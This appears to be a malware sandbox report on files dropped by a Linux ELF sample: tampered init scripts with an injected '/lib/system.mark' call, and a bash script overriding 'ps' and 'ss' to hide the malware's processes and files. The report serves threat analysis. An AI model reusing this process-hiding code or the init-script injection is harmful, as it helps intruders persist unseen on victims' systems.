                        Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides:..open-vm-tools.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# X-Start-Before:.# X-Stop-After:.# Default-Start:.2 3 4 5.# Default-Stop:..0 1 6.# Description:..Runs the open-vm-tools services.# Short-Description:.Runs the open-vm-tools services.### END INIT INFO... /lib/lsb/init-functions..exit_if_not_in_vm () {. if which systemd-detect-virt 1>/dev/null; then./lib/system.mark. checktool='systemd-detect-virt'. else. checktool='vmware-checkvm'. fi.. if ! ${checktool} | grep -iq vmware; then./lib/system.mark. echo "open-vm-tools: not starting as this is not a VMware VM". exit 0. fi.}..case "${1}" in. start). # Check if we're running inside VMWare. exit_if_not_in_vm.. log_daemon_msg "Starting open-vm daemon" "vmtoolsd". start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null || exit 1.
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):1401
                        Entropy (8bit):5.307601355730172
                        Encrypted:false
                        SSDEEP:24:1sqE3A2EYVwMwRwDTMBgK2APfcVwAPYIpPgfS+UGgEIT8YojAf5XERmgLGmgOS/F:1sl3AhYG7RgzJAsVwAgGYfdUz58Y9f5v
                        MD5:0F6B71C6CC119B9DDB34511BD4CF6A49
                        SHA1:F7D8BE03B71EB7597F724CB97C2A8AE62F14A843
                        SHA-256:6A8A127B9D7DE62A9130A55E39521A26D48BE4EC9830AC0C986E3202FE5C5B3C
                        SHA-512:EA0DA81729692BA97978031A72AA79B06E004F1B6D9AE534C68F34AEB65A5FFD9F91F5C1CA27CB6E38DE20E86A0C3C6E5A84C0A70E011C5D91AFBBA7EA647BB4
                        Malicious:true
                        Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth.# Required-Start:.udev $remote_fs $all.# Required-Stop:.$remote_fs.# Should-Start:..$x-display-manager.# Should-Stop:..$x-display-manager.# Default-Start:.2 3 4 5.# Default-Stop:..0 6.# Short-Description:.Stop plymouth during boot and start it on shutdown.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth".DESC="Boot splash manager"..test -x /sbin/plymouthd || exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system.mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..SPLASH="true".for ARGUMENT in $(cat /proc/cmdline).do..case "${ARGUMENT}" in...splash*)....SPLASH="true"....;;....nosplash*|plymouth.enable=0)....SPLASH="false"....;;..esac.done..case "${1}" in..start)...case "${SPLASH}" in....true)...../bin/plymouth quit --retain-splash.....;;...esac...;;...stop)...case "${SPLASH}" in....true).....if ! plymouth --ping.....then./lib/system.mark....../sbin/plymouthd --mode=shutdown.....fi......RUNLEV
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):787
                        Entropy (8bit):5.281955883729912
                        Encrypted:false
                        SSDEEP:12:1snBEfVmWr2lr4HhJ8PWXsbgwfGgrCRzD02xgvRiqhtcy5RujGqGRujrVgDn:1sBEf0FlwhuPBb9GgMHxgvR4MLoVS
                        MD5:F42950D3F937B049D8ECC88A59A65CA3
                        SHA1:E74080DDEE0664F4069E7558C68D2795B752DC55
                        SHA-256:6637BB47EA46FB3556AF6B2A9A39574046FD06237D0BB65D7077F3734B593A00
                        SHA-512:15E48460FDDF9863D5827E8B584BBED72C7EA95DF67C4A9A68E5CF4750C35DEFB8C5C6311DCDCEE9E2608DEE91DC6F76F8D6ED69287F6619AFCF5904AA72A168
                        Malicious:true
                        Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth-log.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# Should-Start:.# Should-Stop:.# Default-Start:.S.# Default-Stop:.# Short-Description:.Inform plymouth that /var/log is writable.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth-log".DESC="Boot splash manager (write log file)"..test -x /bin/plymouth || exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system.mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..case "${1}" in..start)...if plymouth --ping...then./lib/system.mark..../bin/plymouth update-root-fs --read-write...fi...;;...stop|restart|force-reload)....;;...*)...echo "Usage: ${0} {start|stop|restart|force-reload}" >&2...exit 1...;;.esac..exit 0..
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):942
                        Entropy (8bit):5.254527998623176
                        Encrypted:false
                        SSDEEP:12:atdRDNeBuYryMmCU3sBww+k12FsnM5ldlPSSHTm5TeQxala5tV86s+L2s4hk2z7w:aLXx/25+Z+nMfTWTeCKa3VfhL69z0
                        MD5:CBFDB92FECA62D963DF3A25F15C3E88D
                        SHA1:14A84AD6ACD0DDD5777C86FAC10894212CE44F57
                        SHA-256:84225825C32D1961412656F3D0F7D43B2BBB7BB84B34B94B8C678BAC10367DF2
                        SHA-512:1FF7EC530B2CEB51C342E1103849F79B935EAC27965C081F90298B74909C1676B88CBEC2E792418F00CC8BFECB4E47B28F137B233A2325F508A550236BDADE4B
                        Malicious:true
                        Preview:#! /bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: procps.# Required-Start: mountkernfs $local_fs.# Required-Stop:.# Should-Start: udev module-init-tools.# X-Start-Before: $network.# Default-Start: S.# Default-Stop:.# Short-Description: Configure kernel parameters at boottime.# Description: Loads kernel parameters that are specified in /etc/sysctl.conf.### END INIT INFO.#.# written by Elrond <Elrond@Wunder-Nett.org>..DESC="Setting kernel variables".DAEMON=/sbin/sysctl.PIDFILE=none..# Comment this out for sysctl to print every item changed.QUIET_SYSCTL="-q"..do_start_cmd() {..STATUS=0..$DAEMON $QUIET_SYSCTL --system || STATUS=$?..return $STATUS.}..do_stop() { return 0; }.do_status() { return 0; }..
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):4639
                        Entropy (8bit):5.255106060955411
                        Encrypted:false
                        SSDEEP:96:jdRMYo498R0Fz/T+U0lKMuHk8gajHoNUMkx:jdRMYJ98i+U0c1Ex6INUJx
                        MD5:4D1E075A3D6AB76CE7754595802D6C77
                        SHA1:F44434087B007BABB314B8277FFC731930DF0A13
                        SHA-256:5E770B82809000BC0C33FA4901341EC6379D5B799AF444850D0C8D5B33E9B7F9
                        SHA-512:59F9462BCF7A5606187A4EBA51C41D243A5C9EDE484FDD65BA28322F476C22F5FA6866D87C55C40C14E676C4BBD8D4D8455FCADEAECBF7DEA26262DF6418C72B
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#! /bin/sh..### BEGIN INIT INFO.# Provides: rsyncd.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Should-Start: $named autofs.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: fast remote file copy program daemon.# Description: rsync is a program that allows files to be copied to and.# from remote machines in much the same way as rcp..# This provides rsyncd daemon functionality..### END INIT INFO..set -e..# /etc/init.d/rsync: start and stop the rsync daemon..DAEMON=/usr/bin/rsync.RSYNC_ENABLE=false.RSYNC_OPTS=''.RSYNC_DEFAULTS_FILE=/etc/default/rsync.RSYNC_CONFIG_FILE=/etc/rsyncd.conf.RSYNC_PID_FILE=/var/run/rsync.pid.RSYNC_NICE_PARM=''.RSYNC_IONICE_PARM=''..test -x $DAEMON || exit 0... /lib/lsb/init-functions..if [ -s $RSYNC_DEFAULTS_FILE ]; then./lib/system.mark. . $RSYNC_DEFAULTS_FILE. case "x$RSYNC_ENABLE" in..xtrue|xfalse).;;..xinetd)..exit 0....;;..*)..log_fail
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):2899
                        Entropy (8bit):5.277181564959481
                        Encrypted:false
                        SSDEEP:48:7cqmpKHnuoz/SWSZABLG/tm3RpZWE/eXt5Ih3iLqWpvU8lbzZdaZ2YI:75sKHuS8ZABLG1m3rZWE2Xt5Ih3iR5JT
                        MD5:816DFAE328401DBA31A79591D3EBC3F2
                        SHA1:C42E6F379838212F512CB4EEFEBBCD33DF67F7F0
                        SHA-256:72FADCABE0BF5AD5B5BC3382B434617A3E58EE6FE8FA959B8698E5C0EACCA22F
                        SHA-512:62D2B90E1EA0070B376E8E9E9E6BF49094B58491D66FD30482EA1A34FC6CDB7010B12C30012320BE3E963B6D38521E6E36E71AF069115852927859FAF30979DF
                        Malicious:true
                        Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: rsyslog.# Required-Start: $remote_fs $time.# Required-Stop: umountnfs $time.# X-Stop-After: sendsigs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: enhanced syslogd.# Description: Rsyslog is an enhanced multi-threaded syslogd..# It is quite compatible to stock sysklogd and can be .# used as a drop-in replacement..### END INIT INFO..#.# Author: Michael Biebl <biebl@debian.org>.#..# PATH should only include /usr/* if it runs after the mountnfs.sh script.PATH=/sbin:/usr/sbin:/bin:/usr/bin.DESC="enhanced syslogd".NAME=rsyslog..RSYSLOGD=rsyslogd.DAEMON=/usr/sbin/rsyslogd.PIDFILE=/run/rsyslogd.pid..SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$DAEMON" ] || exit 0..# Read configuration variable file if it is present.[ -r /etc/default/$NAME ] && . /etc/default/$NAME..# Define LSB log_* functions... /lib/lsb/init-functions..do_st
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):2293
                        Entropy (8bit):5.008592969018552
                        Encrypted:false
                        SSDEEP:24:aruzoYFiVHCVhQJABlRi5tzldBOVQReMdHwdNw5G/9yNuFibjBk2Jwq5MxnR5/2F:e7Y0u/i5t7RbewG/9diy2OXnL/iOs1
                        MD5:0F06F605D05EA59E83CFDB744A720668
                        SHA1:ED458D2DC1CF9F7EEACF612295016DD4C67FA431
                        SHA-256:1C4C499846B5D9E180E604B84553A2ADD06C11D447C4AC5F42DB30EF5030944D
                        SHA-512:B3BA6C58E83F3C79C6E28AC8EB78184003A17AB8635F013BBBD50363D515344B5619CA008F9F453A8BBBCA01BCF0E649828B0CB1ED6D1BE87085CA4E225FF84C
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#! /bin/sh.#.### BEGIN INIT INFO.# Provides: saned.# Required-Start: $syslog $local_fs $remote_fs.# Required-Stop: $syslog $local_fs $remote_fs.# Should-Start: dbus avahi-daemon.# Should-Stop: dbus avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: SANE network scanner server.# Description: saned makes local scanners available over the.# network..### END INIT INFO... /lib/lsb/init-functions..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/saned.NAME=saned.DESC="SANE network scanner server"..test -x $DAEMON || exit 0..RUN=no.RUN_AS_USER=saned..# Get lsb functions.. /lib/lsb/init-functions..# Include saned defaults if available.if [ -f /etc/default/saned ] ; then./lib/system.mark. . /etc/default/saned.fi..DAEMON_OPTS="-a $RUN_AS_USER"..set -e..case "$1" in. start)..log_daemon_msg "Starting $DESC" "$NAME"..start-stop-daemon --start --quiet --pidfile /var/run/$N
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):1274
                        Entropy (8bit):5.012565313964516
                        Encrypted:false
                        SSDEEP:24:c26Nr+XEgBYxABoO21phrqeYCRjeyvcsTN/RdT7d/Ldld/7K9jp:cPQoO23BqeYSjeybRRdHdTdld/7K9jp
                        MD5:8EFA67FAE6C01453D5F673251C44E223
                        SHA1:ADDB6A8C1B7D583B959EDF19684A1BE2FA76D541
                        SHA-256:48026B299BBAD064F39CB6351B3E6D60E6EA324BB9DF6D777D132F19B2386E5D
                        SHA-512:306042F4929D7BCBB98CC2E14A04D3E36DA7E7BA87F7997CD46DCD7DD2F856D1102469B99D623F6F339F419FD247EBE0ED02C446ADE7FD214F6F14A9156B45F0
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#!/bin/sh.# $Id: init,v 1.3 2004/03/16 01:43:45 zal Exp $.#.# Script to remove stale screen named pipes on bootup..#..### BEGIN INIT INFO.# Provides: screen-cleanup.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: screen sessions cleaning.# Description: Cleans up the screen session directory and fixes its.# permissions if needed..### END INIT INFO..set -e..test -f /usr/bin/screen || exit 0..SCREENDIR=/run/screen..case "$1" in.start). if test -L $SCREENDIR || ! test -d $SCREENDIR; then./lib/system.mark. rm -f $SCREENDIR. mkdir $SCREENDIR. chown root:utmp $SCREENDIR. [ -x /sbin/restorecon ] && /sbin/restorecon $SCREENDIR. fi. find $SCREENDIR -type p -delete.# If the local admin has used dpkg-statoverride to install the screen.# binary with different set[ug]id bits, change the permissions of.# $SCREENDIR accordingly. BINARYPERM=`stat -c%a /usr/bin/screen`. if [ "
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):2519
                        Entropy (8bit):4.743587167790472
                        Encrypted:false
                        SSDEEP:48:DFZazGMU+rI4CXyUH0I6zroGt//AhrHoGa//AuiIngcu/syylyTIsD2E8AB6/oBa:DF0GMU+1iD6foGtQRHoGaQuiIngczVII
                        MD5:5D4D9388F89B176957FDD414AF0D3385
                        SHA1:206408E65660EFF14DE046FBECC38DDA2BCD403F
                        SHA-256:9EDA8584AF6D1D332C01FD105D83BF5DBD41E10148E276D350DE07835A64494D
                        SHA-512:CA317DCB2DB3D6EB63088CF6548CF800C5B2D64430C34F0E587EFA9CE7B4D72B35AAD70516BEECCC19848D3AF3673DAB295F19E923BA5E4700234842BFE38EF8
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#!/bin/sh.#.# spice-vdagent Agent daemon for Spice guests.#.# chkconfig: 345 70 30.# description: Together with a per X-session agent process the spice agent \.# daemon enhances the spice guest user experience with client \.# mouse mode, guest <-> client copy and paste support and more...### BEGIN INIT INFO.# Provides: . .spice-vdagent.# Required-Start: .$local_fs $remote_fs.# Required-Stop: .$local_fs $remote_fs.# Should-Start: .dbus.# Should-Stop: ..# Default-Start: .2 3 4 5.# Default-Stop: .0 1 6.# Short-Description: .Agent daemon for Spice guests.# Description: .Together with a per X-session agent process the spice agent.# .daemon enhances the spice guest user experience with client.# .mouse mode, guest <-> client copy and paste support and more..### END INIT INFO...exec="/usr/sbin/spice-vdagentd".prog="spice-vdagentd".pidfile="/var/run/spice-vdagentd/spice-vdagentd.pid".port="/dev/virtio-ports/com.redhat.spic
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):4195
                        Entropy (8bit):5.078291501927291
                        Encrypted:false
                        SSDEEP:96:jkXSV2BP3Jr4VRy5HoYokXHe5KyWU/O8IhQ:j1ol3J8VOIPq3cBIhQ
                        MD5:53996396D16C98D4AF1BF71D33AE801F
                        SHA1:D47C0F3E4DE104B2DAE047AC53BA85ADFD53B26B
                        SHA-256:D2C361A5A6A9FDEAF530420A519CA1BCB022B13B5B35B827544D70ED99B98720
                        SHA-512:34636E86E4652B1212E5F74E4E792E46786E5FDFDB9ECB7DB085339EDCA9DF752D7B71EF97FE4738921E53825DFB0AECCE877324675A60594A0955B4EC2BFB38
                        Malicious:true
                        Preview:#! /bin/sh..### BEGIN INIT INFO.# Provides:..sshd.# Required-Start:.$remote_fs $syslog.# Required-Stop:.$remote_fs $syslog.# Default-Start:.2 3 4 5.# Default-Stop:...# Short-Description:.OpenBSD Secure Shell server.### END INIT INFO..set -e..# /etc/init.d/ssh: start and stop the OpenBSD "secure shell(tm)" daemon..test -x /usr/sbin/sshd || exit 0.( /usr/sbin/sshd -\? 2>&1 | grep -q OpenSSH ) 2>/dev/null || exit 0..umask 022..if test -f /etc/default/ssh; then./lib/system.mark. . /etc/default/ssh.fi... /lib/lsb/init-functions..if [ -n "$2" ]; then./lib/system.mark. SSHD_OPTS="$SSHD_OPTS $2".fi..# Are we running from init?.run_by_init() {. ([ "$previous" ] && [ "$runlevel" ]) || [ "$runlevel" = S ].}..check_for_no_start() {. # forget it if we're trying to start, and /etc/ssh/sshd_not_to_be_run exists. if [ -e /etc/ssh/sshd_not_to_be_run ]; then ./lib/system.mark..if [ "$1" = log_end_msg ]; then./lib/system.mark.. log_end_msg 0 || true..fi..if ! run_by_init; then./lib/syst
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):7281
                        Entropy (8bit):4.991252121789465
                        Encrypted:false
                        SSDEEP:96:l7vnKGhtBLNNqeIRbyxwfmgBL6FGGgGBj2davQKBJKCYrSVDvtvP7WGP7TQKBJKk:l93DYPbV7+262daaJrSVztbWIeWymj
                        MD5:6B8B951DD1036426916D86617F889FB3
                        SHA1:5845C804AEE0A2C89AA314083FDB112D90B0AE75
                        SHA-256:672A832E328D4AC70CE72DB88A220443383378ED574448B8A31F743707EAB48D
                        SHA-512:DC3D3C056719853FE920BF0622CACFEDE05618331D85DC138C7C462B982222F2F746AF09B77815CDE542DACA4DCD24D084912CCE5F7DEE608431776D3B21BEC4
                        Malicious:true
                        Preview:#!/bin/sh -e.### BEGIN INIT INFO.# Provides: udev.# Required-Start: mountkernfs.# Required-Stop: umountroot.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Start systemd-udevd, populate /dev and load drivers..### END INIT INFO..PATH="/sbin:/bin".NAME="systemd-udevd".DAEMON="/lib/systemd/systemd-udevd".DESC="hotplug events dispatcher".PIDFILE="/run/udev.pid".CTRLFILE="/run/udev/control".OMITDIR="/run/sendsigs.omit.d"..# we need to unmount /dev/pts/ and remount it later over the devtmpfs.unmount_devpts() {. if mountpoint -q /dev/pts/; then./lib/system.mark. umount -n -l /dev/pts/. fi.. if mountpoint -q /dev/shm/; then./lib/system.mark. umount -n -l /dev/shm/. fi.}..# mount a devtmpfs over /dev, if somebody did not already do it.mount_devtmpfs() {. if grep -E -q "^[^[:space:]]+ /dev devtmpfs" /proc/mounts; then./lib/system.mark. mount -n -o remount,nosuid,size=$tmpfs_size,mode=0755 -t devtmpfs devtmpfs /dev. return. fi.. if ! mount -
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):2220
                        Entropy (8bit):4.762470767686369
                        Encrypted:false
                        SSDEEP:48:1LleiFZd/nzngwjacTM/JrNWwh/JbeTX9l:1BDFfrbQvnq
                        MD5:8852A1EF1E949822CC57D126739775E7
                        SHA1:BB530632CE040ACF6D772A83E55594AE03233D2A
                        SHA-256:D47B4F30B3710EBA0EA899BD483D2639EEC4EFE1E2196F3CC69D6C317A182D9D
                        SHA-512:428D49507F1A9E84BE55BA66EBD1E6557E87EABE10BC4CAB0003260279FADE812996410AFD00DA0C49E1A42C2008D2B61ADC7A43470C582FC66840120A827A1D
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides: ufw.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: S.# Default-Stop: 1.# Short-Description: start firewall.# Description: Start ufw firewall.### END INIT INFO..set -e..PATH="/sbin:/bin"..[ -d /lib/ufw ] || exit 0... /lib/lsb/init-functions..for s in "/lib/ufw/ufw-init-functions" "/etc/ufw/ufw.conf" "/etc/default/ufw" ; do. if [ -s "$s" ]; then./lib/system.mark. . "$s". else. log_failure_msg "Could not find $s (aborting)". exit 1. fi.done..error=0.case "$1" in.start). if [ "$ENABLED" = "yes" ] || [ "$ENABLED" = "YES" ]; then./lib/system.mark. log_action_begin_msg "Starting firewall:" "ufw". output=`ufw_start` || error="$?". if [ "$error" = "0" ]; then./lib/system.mark. log_action_cont_msg "Setting kernel variables ($IPT_SYSCTL)". fi. if [ ! -z "$output" ]; then./lib/system.mark. echo "$output" | while read
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):1426
                        Entropy (8bit):5.3259172883252655
                        Encrypted:false
                        SSDEEP:24:aMXni+12wpFKFOGofwWlf/HNVKowwflH+hF/7Px1gr:bni23FKFpbw3GnoH+Dbx2
                        MD5:D520212A01E843BEC46C2A22FAD820FD
                        SHA1:53E168B97E300038916C1038B59912B23AB2C0AF
                        SHA-256:89C4F9A9999E7DB3526C63DF22A69161F6328EEB8E58B8640BDEB4676BFF6DA5
                        SHA-512:E08F7E3736EB322F4C49636515B1AAE43299F09504A63B9920F93D2E42518108E4090E3F622AA6B18E2D196C89BAC0BF74884AA5FDC023CE25D8D529653D0876
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#! /bin/sh.#.### BEGIN INIT INFO.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Provides: unattended-upgrade-shutdown-check.# Default-Start: 2 3 4 5.# Default-Stop: 0 6.# Short-Description: Check if unattended upgrades are being applied.# Description: Check if unattended upgrades are being applied.# and wait for them to finish.### END INIT INFO.set -e..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin..NAME="unattended-upgrades-shutdown".DESC="unattended package upgrades shutdown".SCRIPTNAME="/etc/init.d/$NAME".SHUTDOWN_HELPER="/usr/share/unattended-upgrades/unattended-upgrade-shutdown"..if [ -x /usr/bin/python3 ]; then./lib/system.mark. PYTHON=python3.else. PYTHON=python.fi..# Load the VERBOSE setting and other rcS variables.. /lib/init/vars.sh..# Define LSB log_* functions..# Depend on lsb-base (>= 3.2-14) to ensure that this file is present.. /lib/lsb/init-functions..case "$1" in.
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):1358
                        Entropy (8bit):5.2132074992430075
                        Encrypted:false
                        SSDEEP:24:aNmC4ozLk8BZa8LNfwa0dDEPLu5CB5ZM51Hdwi/DqT0KtOC:3VozBjdh0d4PLuIBvMNwiuIKtl
                        MD5:4A25430D50590B5FD530703742868720
                        SHA1:FB4D80FD6B01795838C4D0A49B1467910FF3FB4D
                        SHA-256:0CE2C7B3FEA143F8855B7BE493906899F6CAFC7D9558AB315D10E62CAF59AC61
                        SHA-512:15375558913D6AF219281A08A470F8BEBC4B729119DC317D9FBFE60892F9CB76AD9BF8704BC0CE7FB3BF5EFA3BE279021EC8000AF4AB3E4034D0CE67C12F91D0
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#! /bin/sh -e.### BEGIN INIT INFO.# Provides: uuidd.# Required-Start: $time $local_fs $remote_fs.# Required-Stop: $time $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: uuidd daemon.# Description: Init script for the uuid generation daemon.### END INIT INFO.#.# Author:."Theodore Ts'o" <tytso@mit.edu>.#.set -e..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DAEMON=/usr/sbin/uuidd.UUIDD_USER=uuidd.UUIDD_GROUP=uuidd.UUIDD_DIR=/run/uuidd.PIDFILE=$UUIDD_DIR/uuidd.pid..test -x $DAEMON || exit 0... /lib/lsb/init-functions..case "$1" in. start)..log_daemon_msg "Starting uuid generator" "uuidd"..if ! test -d $UUIDD_DIR; then./lib/system.mark...mkdir -p $UUIDD_DIR...chown -R $UUIDD_USER:$UUIDD_GROUP $UUIDD_DIR..fi..start_daemon -p $PIDFILE $DAEMON..log_end_msg $?. ;;. stop)..log_daemon_msg "Stopping uuid generator" "uuidd"..killproc -p $PIDFILE $DAEMON..log_end_msg $?. ;;. status)..if pidofproc -p $PIDFILE $DAEMON >/dev/null 2>&
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):2911
                        Entropy (8bit):4.896684913637708
                        Encrypted:false
                        SSDEEP:48:ZETjwC4gFkV8ZSVwxPRyye1vrBy9DuIpPX5uCXAepm1L+/WAhtX76XGMgH3:SIgFkVlVY1IT09DuYX5HX3aidOX8
                        MD5:ED4AAC2A7BFA47958A11198C382AF668
                        SHA1:3646EAC456824AA2D579E5E66F8050CC886C44E7
                        SHA-256:8D107A508429EC4AE1049F1BB79260CC2B4E10EDB952DC764FB4ED7979A409AC
                        SHA-512:AAA3B8EC1B82F46E3FA10ADDF3BB9B7E4FC93B9B575BCD5D4BCE712F17117F10059BF0A0E827982B613422E8FE009F31B8ED68B3B9F4EF2202A73E155CDD4279
                        Malicious:true
                        Preview:#!/bin/sh.# /etc/init.d/x11-common: set up the X server and ICE socket directories.### BEGIN INIT INFO.# Provides: x11-common.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: set up the X server and ICE socket directories.### END INIT INFO..set -e..PATH=/usr/bin:/usr/sbin:/bin:/sbin.SOCKET_DIR=.X11-unix.ICE_DIR=.ICE-unix... /lib/lsb/init-functions.if [ -f /etc/default/rcS ]; then./lib/system.mark. . /etc/default/rcS.fi..do_restorecon () {. # Restore file security context (SELinux).. if which restorecon >/dev/null 2>&1; then./lib/system.mark. restorecon "$1". fi.}..# create a directory in /tmp..# assumes /tmp has a sticky bit set (or is only writeable by root).set_up_dir () {. DIR="/tmp/$1".. if [ "$VERBOSE" != no ]; then./lib/system.mark. log_progress_msg "$DIR". fi. # if $DIR exists and isn't a directory, move it aside. if [ -e $DIR ] && ! [ -d $DIR ] || [ -h $DIR ]; then./lib/system.mar
                        Process:/tmp/ausNOyj9by.elf
                        File Type:Bourne-Again shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):35
                        Entropy (8bit):4.204582217613529
                        Encrypted:false
                        SSDEEP:3:TKH/binKX:siKX
                        MD5:5C67BC6A39813CE4346CB7CA206A9393
                        SHA1:F99586987650CFA169F5110198CBDE17B82FD2BA
                        SHA-256:29EC88CF1C7403CC92602408772AB2FCE6E26E10E29E0C19F6FCF03AC6E1B483
                        SHA-512:BF8701863EB49B3552181620944D05C23C63762E386D6C353609DE3D71784CB87E054F279FE56A1C661C927813DEF4481586E3BC5C820D20DCEC7F3F891F2A8F
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#!/bin/bash./etc/profile.d/bash.cfg
                        Process:/tmp/ausNOyj9by.elf
                        File Type:Bourne-Again shell script, ASCII text executable, with very long lines (705)
                        Category:dropped
                        Size (bytes):4904
                        Entropy (8bit):4.826949277908091
                        Encrypted:false
                        SSDEEP:96:sSr2vBOPmf2/ySr2vBOPmf2/sSr2vBOPmf2/sSr2vBOPmf2/ySr2vBOPmf2/aSrs:si2vBOPmf2/yi2vBOPmf2/si2vBOPmfT
                        MD5:FB5092C6757B35DFD9CC7B755C507463
                        SHA1:8FDCE8F23360026B3D62C9E396D5462C380F49E7
                        SHA-256:6D2B21320E12F8750D3B41A0229585FDF923DC3618C5B249800484126269A446
                        SHA-512:223B51030E765FE129DB9FAEA1F05CA4678EF5B7ED88DA107A812C2C8262DE2DDB8484A6F41D9FF7D225CDA7EA0850DCBFCF8BC28B71048CEFB8C0A7699D92C3
                        Malicious:true
                        Preview:#!/bin/bash.function ps { proc_name=$(/usr/bin/ps $@);proc_name=$(echo "$proc_name" | sed -e '/\/usr\/bin\/include\//d');proc_name=$(echo "$proc_name" | sed -e '/dns-udp4/d');proc_name=$(echo "$proc_name" | sed -e '/quotaon.service/d');proc_name=$(echo "$proc_name" | sed -e '/system.pub/d');proc_name=$(echo "$proc_name" | sed -e '/gateway.sh/d');proc_name=$(echo "$proc_name" | sed -e '/.mod/d');proc_name=$(echo "$proc_name" | sed -e '/libgdi.so.0.8.2/d');proc_name=$(echo "$proc_name" | sed -e '/system.mark/d');proc_name=$(echo "$proc_name" | sed -e '/netstat.cfg/d');proc_name=$(echo "$proc_name" | sed -e '/bash.cfg/d');proc_name=$(echo "$proc_name" | sed -e '/ausNOyj9by.elf/d');echo "$proc_name"; }.function ss { proc_name=$(/usr/bin/ss $@);proc_name=$(echo "$proc_name" | sed -e '/\/usr\/bin\/include\//d');proc_name=$(echo "$proc_name" | sed -e '/dns-udp4/d');proc_name=$(echo "$proc_name" | sed -e '/quotaon.service/d');proc_name=$(echo "$proc_name" | sed -e '/system.pub/d');proc_name=$(
                        Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):76
                        Entropy (8bit):3.7627880354948586
                        Encrypted:false
                        SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                        MD5:D86A1F5765F37989EB0EC3837AD13ECC
                        SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                        SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
